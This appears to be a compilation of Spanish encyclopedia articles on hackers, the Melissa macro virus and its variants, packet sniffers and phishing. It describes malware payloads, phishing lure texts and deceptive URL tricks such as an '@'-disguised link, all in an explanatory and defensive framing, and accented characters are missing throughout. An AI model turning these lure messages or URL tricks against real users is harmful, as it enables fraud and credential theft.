En informtica, un hacker[1] o pirata informtico es una persona que pertenece a una de estas comunidades o subculturas distintas pero no completamente independientes: Gente apasionada por la seguridad informtica. Esto concierne principalmente a entradas remotas no autorizadas por medio de redes de comunicacin como Internet ("Black hats"). Pero tambin incluye a aquellos que depuran y arreglan errores en los sistemas ("White hats") y a los de moral ambigua como son los "Grey hats". Una comunidad de entusiastas programadores y diseadores de sistemas originada en los sesenta alrededor del Instituto Tecnolgico de Massachusetts (MIT), el Tech Model Railroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT.[2] Esta comunidad se caracteriza por el lanzamiento del movimiento de software libre. La World Wide Web e Internet en s misma son creaciones de hackers.[3] El RFC 1392[4] amplia este significado como "persona que se disfruta de un conocimiento profundo del funcionamiento interno de un sistema, en particular de computadoras y redes informticas"

El emblema hacker, un proyecto para crear un smbolo reconocible para la percepcin de la cultura hacker.

La comunidad de aficionados a la informtica domstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa. En la actualidad se usa de forma corriente para referirse mayormente a los criminales informticos, debido a su utilizacin masiva por parte de los medios de comunicacin desde la dcada de 1980. A los criminales se le pueden sumar los llamados "script kiddies", gente que invade computadoras, usando programas escritos por otros, y que tiene muy poco conocimiento sobre cmo funcionan. Este uso parcialmente incorrecto se ha vuelto tan predominante que, en general, un gran segmento de la poblacin no es consciente de que existen diferentes significados. Mientras que los hackers aficionados reconocen los tres tipos de hackers y los hackers de la seguridad informtica aceptan todos los usos del trmino, los hackers del software libre consideran la referencia a intrusin informtica como un uso incorrecto de la palabra, y se refieren a los que rompen los sistemas de seguridad como "crackers" (analoga de "safecracker", que en espaol se traduce como "un ladrn de cajas fuertes").

Hacker

86

Controversia de la definicin de hacker


Los trminos hacker y hack pueden tener connotaciones positivas y negativas. Los programadores informticos suelen usar las palabras hacking y hacker para expresar admiracin por el trabajo de un desarrollador cualificado de soporte lgico, pero tambin se puede utilizar en un sentido negativo para describir una solucin rpida pero poco elegante a un problema. Algunos[quin?] desaprueban el uso del hacking como un sinnimo de cracker, en marcado contraste con el resto del mundo,[dnde?] en el que la palabra hacker se utiliza normalmente para describir a alguien que se infiltra en un sistema informtico con el fin de eludir o desactivar las medidas de seguridad.

Controversia y ambigedad
En un principio se utilizaba "hack" como verbo para expresar "perder el tiempo" (e.j. "Puedo hackear con el ordenador"), el significado del trmino ha cambiado a lo largo de dcadas desde que empez a utilizarse en un contexto informtico. Como su uso se ha extendido ms ampliamente, el significado primario de la palabra, por parte de los nuevos usuarios, ha pasado a uno que entra en conflicto con el nfasis original.

Activismo
Desde el ao 2002-2003, se ha ido configurando una perspectiva ms amplia del hacker, pero con una orientacin a su integracin al hacktivismo en tanto movimiento. Aparecen espacios autnomos denominados hacklab o hackerspace y los hackmeeting como instancias de dilogo de hackers. Desde esta perspectiva, se entiende al hacker como una persona que es parte de una conciencia colectiva que promueve la libertad del conocimiento y la justicia social. En este caso, los roles de un hacker pueden entenderse en cuatro aspectos:
En un sentido amplio el termino Hacker o Hacking se puede asociar a movimientos sociales que promueven cambios en los modos de vida.

Apoyar procesos de apropiacin social o comunitaria de las tecnologas. Poner a disposicin del dominio pblico el manejo tcnico y destrezas alcanzadas personal o grupalmente. Crear nuevos sistemas, herramientas y aplicaciones tcnicas y tecnolgicas para ponerlas a disposicin del dominio pblico. Realizar acciones de hacktivismo tecnolgico con el fin de liberar espacios y defender el conocimiento comn, o mancomunal

Terminologa
White hat y black hat
Un hacker de sombrero blanco (del ingls, White hats), en jerga informtica, se refiere a una tica hacker que se centra en asegurar y proteger los sistemas de Tecnologas de informacin y comunicacin.[5] Estas personas suelen trabajar para empresas de seguridad informtica las cuales los denominan, en ocasiones, zapatillas o equipos tigre.[6] Por el contrario, un hacker de sombrero negro (del ingls, Black Hat) es el villano o chico malo, especialmente en una pelcula de western, de ah que en tal carcter se use un sombrero negro, en contraste con el hroe, el de sombrero blanco. Tambin conocidos como "crackers" muestran sus habilidades en informtica rompiendo sistemas de seguridad de computadoras, colapsando servidores, entrando a zonas restringidas, infectando redes o apoderndose de ellas, entre

Hacker otras muchas cosas utilizando sus destrezas en mtodos hacking. En los ltimos aos, los trminos sombrero blanco y un sombrero negro han sido aplicados a la industria del posicionamiento en buscadores (Search Engine Optimization, SEO). Las tcticas de posicionamiento en buscadores de los hackers de sombrero negro, tambin llamada spamdexing, intento de redireccionar los resultados de la bsqueda a pginas de destino particular, son una moda que est en contra de los trminos de servicio de los motores de bsqueda, mientras que los hackers de sombrero blanco, utilizan mtodos que son generalmente aprobados por los motores de bsqueda.

87

Samuri
Normalmente es alguien contratado para investigar fallos de seguridad, que investiga casos de derechos de privacidad, est amparado por la primera enmienda estadounidense o cualquier otra razn de peso que legitime acciones semejantes. Los samuris desdean a los crackers y a todo tipo de vndalos electrnicos. Tambin se dedican a hacer y decir cmo saber sobre la seguridad con sistemas en redes[7]

Phreaker
De phone freak ("monstruo telefnico"). Son personas con conocimientos amplios tanto en telfonos modulares (TM) como en telfonos mviles.

Wannabe
Generalmente son aquellos a los que les interesa el tema de hacking y/o phreaking pero que por estar empezando no son reconocidos por la elite. Son aquellos que si perseveran aprendiendo y estudiando, pueden llegar a convertirse perfectamente en hackers. No por ser novato es repudiado, al igual que tampoco hay que confundirlo con un lammer.

Lammer o script-kiddie
Es un trmino coloquial ingls aplicado a una persona falta de habilidades tcnicas, generalmente no competente en la materia, que pretende obtener beneficio del hacking sin tener los conocimientos necesarios. Su alcance se basa en a buscar y descargar programas y herramientas de intrusin informtica, cibervandalismo, propagacin de software malicioso para luego ejecutarlo como simple usuario, sin preocuparse del funcionamiento interno de stos ni de los sistemas sobre los que funcionan. En muchos casos presume de conocimientos o habilidades que no posee.

Newbie
Newbie es un trmino utilizado comnmente en comunidades en lnea para describir a un novato, en esta rea, es el que no posee muchos conocimientos en el tema.

En la cultura popular
La trama de la novela "La piel del tambor" de Arturo Prez-Reverte gira en torno a un misterioso pirata informticos.

Referencias
[2] http:/ / www. catb. org/ ~esr/ writings/ cathedral-bazaar/ hacker-history/ ar01s02. html [5] Qu es sombrero blanco? - una definicin de Whatis.com (en ingls) (http:/ / searchsecurity. techtarget. com/ sDefinition/ 0,,sid14_gci550882,00. html) [6] tiger team (en ingls) (http:/ / www. catb. org/ jargon/ html/ T/ tiger-team. html)

Hacker

88

Enlaces externos
Definicin de hacker en el Jargon File (http://www.catb.org/jargon/html/H/hacker.html) (ingls)

Melissa (informtica)
Melissa es un virus macro que infecta documentos de Microsoft Office. Tambin conocido como "W97M", "Simpsons" (en referencia a los dibujos animados estadounidenses), "Kwyjibo" "Kwejeebo", (en referencia a Bart Simpson cuando juega a poner esta palabra imaginaria en el Scrabble y debido a que en el cdigo del virus dice written by Kwyjibo).

Historia
El 26 de marzo de 1999 y en apenas unos das, protagoniz uno de los casos de infeccin masiva ms importantes de la historia de los virus informticos. De hecho, compaas como Microsoft, Intel o Lucent Technologies tuvieron que bloquear sus conexiones a Internet debido a la accin de Melissa.[1] Melissa se distribuy por primera vez en la discusin del grupo de noticias Usenet:alt.sex. El virus estaba dentro de un archivo llamado "List.doc", que deca contener una lista de contrasea con las que se permitia el acceso a 80 sitios web pornogrficos. La forma original del virus fue enviada por e-mail a muchas personas.

Autor
Melissa fue creado por David L. Smith de Aberdeen, Nueva Jersey. l reconoci en su declaracin de culpabilidad que el virus melissa caus ms de 80 millones de dlares en daos a las empresas norteamericanas.[2] "Yo no esperaba ni anticipar la cantidad de dao que tuvo lugar, cuando publiqu el virus, que esperaba que el perjuicio econmico sera menor e incidental", dijo Smith. El virus lo cre en memoria de una bailarina topless de Florida de la cual se haba enamorado. Smith fue condenado a 10 aos de prisin, pasando 20 meses en prisin y multado con 5.000 dlares. Smith posteriormente colaborara para ayudar al FBI en la bsqueda de Jan de Wit, el creador holands del virus informtico Anna Kournikova.[3]

Especificaciones del virus


Melissa se puede propagar en los procesadores de textos Microsoft Word 97 y Word 2000 y Microsoft Excel 97, 2000 y 2003. Se puede enviar as mismo por correo electrnico desde Microsoft Outlook 97 o 98, envindolo a los primeros 50 contactos de la libreta de direcciones en un email que marca.[4]

Versin del virus


[5] [6][7] [8] [9] [10] [11]

Melissa A From: (nombre del usuario infectado) *Asunto: Importante Mensaje de "Nombre del remitente To: (50 nombres de la agenda) Texto del Mensaje: Aqu est ese documento que usted solicit... no mostrar a nadie;-) Archivo adjunto: LIST.DOC

Melissa (informtica) Que es un documento de Word que contiene el virus, que si se descarga y se abre, a continuacin, la macro del documento se ejecuta e inician los intentos de envos masivos de s mismo a las 50 personas de la libreta de direcciones del correo electrnico, con ello multiplicndose, y al ser infectado escribe en los documentos que se tengan abiertos: Veintids puntos, ms triple puntuacin de palabras, ms cincuenta puntos por usar todas mis cartas. El juego termina. Me voy de aqu Cuando se abre el archivo de Word, se infecta la plantilla de documentos normal.dot, infectando a partir de ello todos los documentos de Word. Esto ocurre cuando el minutero del reloj coincide con el da del mes. Melissa AD WM97 Virus de macros y Gusano de Internet. Se enva por correo a las primeras 150 direcciones de e-mail, de la agenda del Outlook. Crea tres archivos en el directorio raz, el CMOS.COM, FAT32.COM y DRIVES.BAT. El archivo DRIVES.BAT se ejecuta al reinicio del equipo al correr el AUTOEXEC.BAT, el cul es modificado para ello, e intenta borrar todos los datos en los discos D: y los otros existentes. El virus cambia la fecha de la computadora. Melissa AM Si se tienen ms de 10 nombres en su libreta de direcciones en el Outlook, el virus se reenviar a si mismo va e-mail a un total de 30 o 60 % de estos contactos. Estos mensajes sern enviados aleatoriamente con los atributos de prioridades Baja, Normal o Alta. *Asunto: Se genera al azar construyndose una frase con una serie de palabras como: Hello!, Hi!, Here, I think this, Gee...Guess this, is, used to be, are, that, the, your, file, document, .doc, you requested, they asked Esto puede generar: *Asuntos como: Hola! Creo que esto sola ser el documento que ha solicitado. Hola! Vaya ... Supongo que esto es el archivo que pidi ". Adjunto al mensaje se incluye un documento Word infectado. WM97/Melissa AM tambin enva informacin del sistema infectado, incluyendo datos como nombre de usuario, zona horaria, nombre del usuario registrado, etc., a ciertas direcciones de correo electrnico. Se supone que la idea del autor es recabar con esto una base de datos de los usuarios infectados. Melissa AO En equipos que cuentan con Outlook, enviar e-mail con: *Asunto: Muy URGENTE: a todos los usuarios de correo electrnico Mensaje: Este anuncio es para todos los usuario de correo electrnico. Por favor, tenga en cuenta que nuestro servidor de correo electrnico se cay y se recomienda que lea el documento que se adjunta con este e-mail. Melissa B Es una variante que solo tiene activa su parte de gusano. En su cdigo, en el campo de comentario del autor del documento, se lee: No queremos infectar su PC; solo avisarle *Asunto: No confes en nadie. Mensaje: Ten cuidado con lo que abres, podra ser un virus.

89

Melissa (informtica) Archivo adjunto: Cuando el documento es abierto, el gusano comprueba el registro del sistema buscando rastros del "Melissa.a", y si no est presente, enva un mensaje con una copia del documento infectado , Con el texto: Esto podra haber tenido resultados desastrosos. Ten ms cuidado la prxima vez que se abre un e-mail. Protjase a s mismo! Descubra cmo en estos sitios web: Y anexa algunas ligas a sitios Web. Melissa I Esta versin del virus, sortea aleatoriamente el asunto y el mensaje de entre estas ocho posibilidades en Ingles. 1. *Asunto: 80mb gratis de espacio Web! Mensaje: Echa un vistazo al documento adjunto para ms detalles sobre cmo obtener el espacio libre. Est bien, ahora tengo un montn de espacio. 2. *Asunto: Checa esto! Mensaje: Esto es un poco de material malvado! 3.*Asunto: Sitios Cool . Mensaje: Echa un vistazo al documento adjunto para obtener una lista de algunos de los mejores sitios en la Web. 4. *Asunto: * Descargas Gratis . Mensaje: Aqu est una lista de sitios, donde se puede obtener descargas gratuitas. (El asterisco se sustituye con un carcter aleatorio). 5. *Asunto: Hardware barato. Mensaje: He adjuntado una lista de sitios web donde se puede obtener Hardware barato 6. *Asunto: Msica gratis. Mensaje: Aqu est una lista de lugares donde se puede obtener msica gratis. 7. *Asunto: Pregunta para usted ... Mensaje: Es bastante complicado as que lo he conectado. 8. *Asunto: Software barato. Mensaje: El documento adjunto contiene una lista de sitios web donde se puede obtener software barato Archivo adjunto: El virus Melissa I, utiliza una clave de registro llamada "emprica", para comprobar que se ha hecho el envo de correo masivo. Si el nmero de minutos es igual al nmero de horas, (ejemplos 8:8 A.M., 10:10 A.M.) El virus inserta el texto, en el documento activo: Todos los imperios caen, slo tienes que saber dnde presionar. Melissa O, W97M.Melissa AA, W97M.Duhalde, W97M.Melissa Variant. Variante modificada que emplean capacidades heursticas, para evitar que los antivirus lo detecten. Este virus contiene referencias a la eleccin presidencial del 9 de abril de 2000, en el Per. Se trata de un virus de MACRO que es capaz de transmitirse por correo electrnico automticamente de un usuario a otro y que podra transmitir informacin confidencial desde la computadora infectada sin que se de cuenta el usuario. Contiene 2 rutinas maliciosas (payloads), dependiendo de si se usa Office 97 2000, con lo que desactivar la opcin de Seguridad en Macros del men Herramientas. Modifica el registro de Windows, de este modo para saber que ya se ha enviado y as no volver a hacerlo en ese equipo. Dicha marca es la entrada: HKEY_CURRENT_USER\Software\Microsoft\Office\ x?" con valor "y". Elecciones2000 = Pacocha :-P Tambin modifica la plantilla Normal.DOT, con lo que se infecta a partir de que se guarde el documento en Word.

90

Melissa (informtica) El correo electrnico tiene el siguiente aspecto: *Asunto: Presidente Duhalde Mensaje: Programa de Gobierno 1999 - 2004. Archivo adjunto:AVISEN A LOS QUE PUEDAN Me acaban de avisar que ha aparecido un virus que se enva por correo bajo el titulo de ELECCIONES 2000 ULTIMAS ENCUESTAS DE APOYO. Cuando lo abren se borra el disco duro. Por favor reenven este correo a sus amigos para alertarles al respecto. Dgales que los borren sin abrirlos. Si se tiene abierto un documento y los minutos del reloj ms uno coinciden con el da, se inserta un espacio en blanco en el texto en donde esta el cursor. Melissa Papa El "Papa" est basado en el mismo cdigo del "Melissa", infecta nicamente archivos de Excel 97. Utiliza tambin el Microsoft Outlook para sus envos. Sin embargo, por su mtodo de infeccin, puede considerarse un gusano. El cdigo de este gusano(worm) contiene un procedimiento que abre e infecta cualquier libro de trabajo de Excel. Utiliza lenguaje Visual Basic, enva sus propias copias va e-mail, del Outlook, a cada una de las primeras 60 direcciones de la libreta de direcciones: *Asunto: Fwd: Libro de trabajo de todos. Net y Fred Cohen Texto:Contiene informacin urgente. No le preste atencin a advertencias de macros Al mensaje se adjunta un archivo de Excel infectado. Aleatoriamente en su numero de envos, el gusano inunda con mensajes el sitio Web de "Fred Cohen & Associates" una IP especifica. Melissa U (gen1) Acta en las versiones Word 97 o Word 2000. El archivo adjunto: Se descarga como un archivo corrupto o defectuoso por lo que los antivirus lo ignoran y al momento de ser ejecutado lo reacomoda hacindolo vlido. Al ser abierto, el virus se activa y empieza a borrar archivos importantes de sistema como son: c: \ command.com c: \ IO.SYS c: \ Ntdetect.com c: \ Suhdlog.dat d: \ command.com d: \ IO.SYS D: \ Suhdlog.dat Para posteriormente enva automticamente los correos electrnicos, a travs de las listas de direcciones del correo electrnico, de los que reciben el correo infectado. Melissa V Esta variante es similar a Melissa.U. Se enva a 40 direcciones de e-mail. Mensaje::Tema: Mis imgenes (nombre de usuario) El mensaje est vaco, y (nombre de usuario) se sustituye con el nombre del usuario registrado en Word. Se eliminarn todos los archivos de la raz de las diferentes unidades del equipo, Despus de que Melissa.V se ha enviado por correo.

91

Melissa (informtica) Melissa W Se activa la carga til a las 10 horas del da 10 de cada mes, cuando el virus inserta el siguiente texto en el documento abierto: worm! Vamos que nos gusta.

92

Prevenciones
Contar con un antivirus actualizado. No hay que reenviar estos mensajes nunca.

Referencias

Analizador de paquetes
En informtica, un analizador de paquetes es un programa de captura de las tramas de una red de computadoras. Es algo comn que, por topologa de red y necesidad material, el medio de transmisin (cable coaxial, cable de par trenzado, fibra ptica, etc.) sea compartido por varias computadoras y dispositivos de red, lo que hace posible que un ordenador capture las tramas de informacin no destinadas a l. Para conseguir esto el analizador pone la tarjeta de red en un estado conocido como "modo promiscuo" en el cual en la capa de enlace de datos no son descartadas las tramas no destinadas a la direccin MAC de la tarjeta; de esta manera se puede capturar (sniff, "olfatear") todo el trfico que viaja por la red. Los analizadores de paquetes tienen diversos usos, como monitorear redes para detectar y analizar fallos, o para realizar ingeniera inversa en protocolos de red. Tambin es habitual su uso para fines maliciosos, como robar contraseas, interceptar correos electrnicos, espiar conversaciones de chat, etc.

Topologa de redes y analizadores de paquetes


La cantidad de tramas que puede obtener un analizador depende de la topologa de red, del modo donde est instalado y del medio de transmisin. Por ejemplo: Para redes antiguas con topologas en estrella, el analizador se podra instalar en cualquier nodo, ya que lo que hace el nodo central es retransmitir todo lo que recibe a todos los nodos. Sin embargo en las redes modernas, en las que solo lo retransmite al nodo destino, el nico lugar donde se podra poner el analizador para que capturara todas las tramas sera el nodo central. Para topologas en anillo, doble anillo y en bus, el analizador se podra instalar en cualquier nodo, ya que todos tienen acceso al medio de transmisin compartido. Para las topologas en rbol, el nodo con acceso a ms tramas sera el nodo raz, aunque con los conmutadores ms modernos, las tramas entre niveles inferiores de un nodo viajaran directamente y no se propagaran al nodo raz. Es importante remarcar el hecho de que los analizadores slo tienen efecto en redes que comparten el medio de transmisin como en redes sobre cable coaxial, cables de par trenzado o redes Wi-Fi. El uso de conmutadores en lugar de concentradores incrementa la seguridad de la red ya que limita el uso de analizadores al dirigirse las tramas nicamente a sus correspondientes destinatarios.

Analizador de paquetes

93

Utilidad
Los principales usos que se le pueden dar son: Captura automtica de contraseas enviadas en claro y nombres de usuario de la red. Esta capacidad es utilizada en muchas ocasiones por crackers para atacar sistemas a posteriori. Conversin del trfico de red en un formato inteligible por los humanos. Anlisis de fallos para descubrir problemas en la red, tales como: por qu el ordenador A no puede establecer una comunicacin con el ordenador B? Medicin del trfico, mediante el cual es posible descubrir cuellos de botella en algn lugar de la red. Deteccin de intrusos, con el fin de descubrir hackers. Aunque para ello existen programas especficos llamados IDS (Intrusion Detection System, Sistema de Deteccin de intrusos), estos son prcticamente analizadores con funcionalidades especficas. Creacin de registros de red, de modo que los hackers no puedan detectar que estn siendo investigados. Para los desarrolladores, en aplicaciones cliente-servidor. Les permite analizar la informacin real que se transmite por la red.

Enlaces externos
Que es un sniffer? [1]

Referencias
[1] http:/ / www. mundocisco. com/ 2009/ 08/ que-es-un-sniffer. html

Phishing
Phishing es un trmino informtico que denomina un tipo de delito encuadrado dentro del mbito de las estafas cibernticas, y que se comete mediante el uso de un tipo de ingeniera social caracterizado por intentar adquirir informacin confidencial de forma fraudulenta (como puede ser una contrasea o informacin detallada sobre tarjetas de crdito u otra informacin bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicacin oficial electrnica, por lo comn un correo electrnico, o algn sistema de mensajera instantnea[1] o incluso utilizando tambin llamadas telefnicas.[2]

ste es un ejemplo de un intento de phishing. Hacindose pasar por un correo electrnico oficial, trata de engaar a los clientes del banco para que den informacin acerca de su cuenta con un enlace a la pgina del phisher.

Dado el creciente nmero de denuncias de incidentes relacionados con el phishing, se requieren mtodos adicionales de proteccin. Se han realizado intentos con leyes que castigan la prctica y campaas para prevenir a los usuarios con la aplicacin de medidas tcnicas a los programas.

Phishing

94

Historia del phishing


Origen del trmino
El trmino phishing proviene de la palabra inglesa "fishing" (pesca), haciendo alusin al intento de hacer que los usuarios "muerdan el anzuelo".[3] A quien lo practica se le llama phisher.[4] Tambin se dice que el trmino phishing es la contraccin de password harvesting fishing (cosecha y pesca de contraseas), aunque esto probablemente es un acrnimo retroactivo, dado que la escritura 'ph es comnmente utilizada por hackers para sustituir la f, como raz de la antigua forma de hacking telefnico conocida como phreaking.[5] La primera mencin del trmino phishing data de enero de 1996. Se dio en el grupo de noticias de hackers alt.2600,[6] aunque es posible que el trmino ya hubiera aparecido anteriormente en la edicin impresa del boletn de noticias hacker 2600 Magazine.[7] El trmino phishing fue adoptado por quienes intentaban "pescar" cuentas de miembros de AOL.

Phishing en AOL
Quienes comenzaron a hacer phishing en AOL durante los aos 1990 solan obtener cuentas para usar los servicios de esa compaa a travs de nmeros de tarjetas de crdito vlidos, generados utilizando algoritmos para tal efecto. Estas cuentas de acceso a AOL podan durar semanas e incluso meses. En 1995 AOL tom medidas para prevenir este uso fraudulento de sus servicios, de modo que los crackers recurrieron al phishing para obtener cuentas legtimas en AOL. El phishing en AOL estaba estrechamente relacionado con la comunidad de warez que intercambiaba software falsificado. Un cracker se haca pasar como un empleado de AOL y enviaba un mensaje instantneo a una vctima potencial. Para poder engaar a la vctima de modo que diera informacin confidencial,[8] el mensaje poda contener textos como "verificando cuenta" o "confirmando informacin de factura". Una vez el usuario enviaba su contrasea, el atacante poda tener acceso a la cuenta de la vctima y utilizarla para varios propsitos criminales, incluyendo el spam. Tanto el phishing como el warezing en AOL requeran generalmente el uso de programas escritos por crackers, como el AOLHell. En 1997 AOL reforz su poltica respecto al phishing y los warez fueron terminantemente expulsados de los servidores de AOL. Durante ese tiempo el phishing era tan frecuente en AOL que decidieron aadir en su sistema de mensajera instantnea, una lnea de texto que indicaba: no one working at AOL will ask for your password or billing information (nadie que trabaje en AOL le pedir a usted su contrasea o informacin de facturacin). Simultneamente AOL desarroll un sistema que desactivaba de forma automtica una cuenta involucrada en phishing, normalmente antes de que la vctima pudiera responder. Los phishers se trasladaron de forma temporal al sistema de mensajera instantneo de AOL (AIM), debido a que no podan ser expulsados del servidor de AIM. El cierre obligado de la escena de warez en AOL caus que muchos phishers dejaran el servicio, y en consecuencia la prctica.[9]

Intentos recientes de phishing


Los intentos ms recientes de phishing han tomado como objetivo a clientes de bancos y servicios de pago en lnea. Aunque el ejemplo que se muestra en la primera imagen es enviado por phishers de forma indiscriminada con la esperanza de encontrar a un cliente de dicho banco o servicio, estudios recientes muestran que los phishers en un principio son capaces de establecer con qu banco una posible vctima tiene relacin, y de ese modo enviar un correo electrnico, falseado apropiadamente, a la posible vctima.[10] En trminos generales, esta variante hacia objetivos especficos en el phishing se ha denominado spear phishing (literalmente pesca con arpn). Los sitios de Internet con fines sociales tambin se han convertido en objetivos para los phishers, dado que mucha de la informacin provista en estos sitios puede ser utilizada en el robo de identidad.[11] Algunos experimentos han otorgado una tasa de xito de un 90% en ataques phishing en redes sociales.[12] A finales de 2006 un gusano informtico se apropi de

Phishing algunas pginas del sitio web MySpace logrando redireccionar los enlaces de modo que apuntaran a una pgina web diseada para robar informacin de ingreso de los usuarios.[13]

95

Tcnicas de phishing
La mayora de los mtodos de phishing utilizan la manipulacin en el diseo de el correo electrnico para lograr que un enlace parezca una ruta legtima de la organizacin por la cual se hace pasar el impostor. URLs manipuladas, o el uso de subdominios, son trucos comnmente usados por phishers; por ejemplo en esta URL: http://www.nombredetubanco.com/ejemplo, en la cual el texto mostrado en la pantalla no corresponde con la direccin real a la cual conduce. Otro ejemplo para disfrazar enlaces es el de utilizar direcciones que contengan el carcter arroba: @, para posteriormente preguntar el nombre de usuario y contrasea (contrario a los estndares[14]). Por ejemplo, el enlace http://www.google.com@members.tripod.com/ puede engaar a un observador casual y hacerlo creer que el enlace va a abrir en la pgina de www.google.com, cuando realmente el enlace enva al navegador a la pgina de members.tripod.com (y al intentar entrar con el nombre de usuario de www.google.com, si no existe tal usuario, la pgina abrir normalmente). Este mtodo ha sido erradicado desde entonces en los navegadores de Mozilla[15] e Internet Explorer.[16] Otros intentos de phishing utilizan comandos en JavaScripts para alterar la barra de direcciones. Esto se hace poniendo una imagen de la URL de la entidad legtima sobre la barra de direcciones, o cerrando la barra de direcciones original y abriendo una nueva que contiene la URL ilegtima. En otro mtodo popular de phishing, el atacante utiliza contra la vctima el propio cdigo de programa del banco o servicio por el cual se hace pasar. Este tipo de ataque resulta particularmente problemtico, ya que dirige al usuario a iniciar sesin en la propia pgina del banco o servicio, donde la URL y los certificados de seguridad parecen correctos. En este mtodo de ataque (conocido como Cross Site Scripting) los usuarios reciben un mensaje diciendo que tienen que "verificar" sus cuentas, seguido por un enlace que parece la pgina web autntica; en realidad, el enlace est modificado para realizar este ataque, adems es muy difcil de detectar si no se tienen los conocimientos necesarios. Otro problema con las URL es el relacionado con el manejo de Nombre de dominio internacionalizado (IDN) en los navegadores, puesto que puede ser que direcciones que resulten idnticas a la vista puedan conducir a diferentes sitios (por ejemplo dominio.com se ve similar a dmini.com, aunque en el segundo las letras "o" hayan sido reemplazadas por la correspondiente letra griega micron, ""). Al usar esta tcnica es posible dirigir a los usuarios a pginas web con malas intenciones. A pesar de la publicidad que se ha dado acerca de este defecto, conocido como IDN spoofing[17] o ataques homgrafos,[18] ningn ataque conocido de phishing lo ha utilizado.

Lavado de dinero producto del phishing


Actualmente empresas ficticias intentan reclutar teletrabajadores por medio de correo electrnicos, chats, irc y otros medios, ofrecindoles no slo trabajar desde casa sino tambin otros jugosos beneficios. Aquellas personas que aceptan la oferta se convierten automticamente en vctimas que incurren en un grave delito sin saberlo: el blanqueo de dinero obtenido a travs del acto fraudulento de phishing. Para que una persona pueda darse de alta con esta clase de empresas debe rellenar un formulario en el cual indicar, entre otros datos, su nmero de cuenta bancaria. Esto tiene la finalidad de ingresar en la cuenta del trabajador-vctima el dinero procedente de estafas bancarias realizadas por el mtodo de phishing. Una vez contratada, la vctima se convierte automticamente en lo que se conoce vulgarmente como mulero. Con cada acto fraudulento de phishing la vctima recibe el cuantioso ingreso en su cuenta bancaria y la empresa le notifica del hecho. Una vez recibido este ingreso, la vctima se quedar un porcentaje del dinero total, pudiendo rondar el 10%-20%, como comisin de trabajo y el resto lo reenviar a travs de sistemas de envo de dinero a cuentas indicadas por la seudo-empresa.

Phishing Dado el desconocimiento de la vctima (muchas veces motivado por la necesidad econmica) sta se ve involucrada en un acto de estafa importante, pudiendo ser requerido por la justicia previa denuncia de los bancos. Estas denuncias se suelen resolver con la imposicin de devolver todo el dinero sustrado a la vctima, obviando que este nicamente recibi una comisin. Fases En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrnicos, a travs de mensajes de ofertas de empleo con una gran rentabilidad o disposicin de dinero (hoax o scam). En el caso de que caigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como: Datos personales y nmero de cuenta bancaria. Se comete el phishing, ya sea el envo global de millones de correos electrnicos bajo la apariencia de entidades bancarias, solicitando las claves de la cuenta bancaria (phishing) o con ataques especficos. El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales son transmitidas a las cuentas de los intermediarios (muleros). Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevndose stos las cantidades de dinero y aqullos los intermediarios el porcentaje de la comisin.

96

Daos causados por el phishing


Los daos causados por el phishing oscilan entre la prdida del acceso al correo electrnico a prdidas econmicas sustanciales. Este tipo de robo de identidad se est haciendo cada vez ms popular por la facilidad con que personas confiadas normalmente revelan informacin personal a los phishers, incluyendo nmeros de tarjetas de crdito y nmeros de seguridad social. Una vez esta informacin es adquirida, los phishers pueden usar datos personales para crear cuentas falsas utilizando el nombre de la vctima, gastar el crdito de la vctima, o incluso impedir a las vctimas acceder a sus propias cuentas.

Una grfica muestra el incremento en los reportes de phishing desde octubre de 2004 hasta junio de 2005.

Se estima que entre mayo de 2004 y mayo de 2005, aproximadamente 1,2 millones de usuarios de computadoras en los Estados Unidos tuvieron prdidas a causa del phishing, lo que suma a aproximadamente $929 millones de dlares estadounidenses.[19] Los negocios en los Estados Unidos perdieron cerca de 2000 millones de dlares al ao mientras sus clientes eran vctimas.[20] El Reino Unido tambin sufri el alto incremento en la prctica del phishing. En marzo del 2005, la cantidad de dinero reportado que perdi el Reino Unido a causa de esta prctica fue de aproximadamente 12 millones de libras esterlinas.[21]

Phishing

97

Anti-Phishing
Existen varias tcnicas diferentes para combatir el phishing, incluyendo la legislacin y la creacin de tecnologas especficas que tienen como objetivo evitarlo.

Respuestas organizativas
Una estrategia para combatir el phishing adoptada por algunas empresas es la de entrenar a los empleados de modo que puedan reconocer posibles ataques. Una nueva tctica de phishing donde se envan correos electrnicos de tipo phishing a una compaa determinada, conocido como spear phishing, ha motivado al entrenamiento de usuarios en varias localidades, incluyendo la Academia Militar de West Point en los Estados Unidos. En un experimento realizado en junio del 2004 con spear phishing, el 80% de los 500 cadetes de West Point a los que se les envi un correo electrnico falso fueron engaados y procedieron a dar informacin personal.[22] Un usuario al que se le contacta mediante un mensaje electrnico y se le hace mencin sobre la necesidad de "verificar" una cuenta electrnica puede o bien contactar con la compaa que supuestamente le enva el mensaje, o puede escribir la direccin web de un sitio web seguro en la barra de direcciones de su navegador para evitar usar el enlace que aparece en el mensaje sospechoso de phishing. Muchas compaas, incluyendo eBay y PayPal, siempre se dirigen a sus clientes por su nombre de usuario en los correos electrnicos, de manera que si un correo electrnico se dirige al usuario de una manera genrica como (Querido miembro de eBay) es probable que se trate de un intento de phishing.

Respuestas tcnicas
Hay varios programas informticos anti-phishing disponibles. La mayora de estos programas trabajan identificando contenidos phishing en sitios web y correos electrnicos; algunos software anti-phishing pueden por ejemplo, integrarse con los navegadores web y clientes de correo electrnico como una barra de herramientas que muestra el dominio real del sitio visitado. Los filtros de spam tambin ayudan a proteger a los usuarios de los phishers, ya que reducen el nmero de correos electrnicos relacionados con el phishing recibidos por el usuario. Muchas organizaciones han introducido la caracterstica denominada pregunta secreta, en la que se pregunta informacin que slo debe ser conocida por el usuario y Alerta del navegador Firefox antes de acceder a pginas sospechosas de phishing. la organizacin. Las pginas de Internet tambin han aadido herramientas de verificacin que permite a los usuarios ver imgenes secretas que los usuarios seleccionan por adelantado; s estas imgenes no aparecen, entonces el sitio no es legtimo.[23] Estas y otras formas de autentificacin mutua continan siendo susceptibles de ataques, como el sufrido por el banco escandinavo Nordea a finales de 2005.[24] Muchas compaas ofrecen a bancos y otras entidades que sufren de ataques de phishing, servicios de monitoreo continuos, analizando y utilizando medios legales para cerrar pginas con 